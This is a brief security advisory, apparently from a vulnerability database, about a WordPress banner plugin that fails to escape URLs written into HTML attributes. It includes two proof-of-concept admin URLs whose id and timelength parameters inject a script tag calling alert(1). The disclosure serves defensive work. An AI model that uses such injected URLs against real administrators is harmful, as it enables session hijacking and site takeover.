Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
Have an admin open URLs: - https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage;=Overview&id;=1&timelength;="><script>alert(1)<%2Fscript> - https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage;=edit_zone&id;="><script>alert(1)<%2Fscript>